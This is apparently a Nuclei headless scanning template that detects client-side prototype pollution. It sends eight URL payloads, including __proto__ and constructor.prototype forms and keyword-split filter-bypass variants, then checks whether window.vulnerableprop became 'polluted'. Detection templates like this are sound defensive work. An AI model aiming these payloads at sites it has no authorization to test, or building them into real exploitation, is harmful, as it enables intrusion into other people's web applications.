id: prototype-pollution-check

info:
  name: Prototype Pollution Check
  author: pdteam
  severity: medium
  metadata:
    max-request: 8
    verified: true
  tags: headless

headless:
  - steps:
      - args:
          url: "{{BaseURL}}?constructor[prototype][vulnerableprop]=polluted#constructor[prototype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract1
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract1
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constructor.prototype.vulnerableprop=polluted#constructor.prototype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract2
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract2
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__proto__[vulnerableprop]=polluted#__proto__.vulnerableprop=polluted&__proto__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract3
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract3
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__proto__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract4
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract4
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__[vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract5
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract5
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?__pro__proto__to__.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract6
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract6
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor[protoprototypetype][vulnerableprop]=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract7
        args:
          code: |
            () => {
             return window.vulnerableprop
            }
    matchers:
      - type: word
        part: extract7
        words:
          - "polluted"

  - steps:
      - args:
          url: "{{BaseURL}}?constconstructorructor.protoprototypetype.vulnerableprop=polluted"
        action: navigate

      - action: waitload

      - action: script
        name: extract8
        args:
          code: |
            () => {
             return window.vulnerableprop
            }

    matchers:
      - type: word
        part: extract8
        words:
          - "polluted"
# digest: 4a0a00473045022100f13ceb8a2f5cb2951a224b4cae1b6ebba91ff7c1ad2e3862a12f7824d74925080220462e096ee2dc84e717dc95341d96922eab4594202dce02cff5dad9aed5577b00:922c64590222798bb761d5b6d8e72950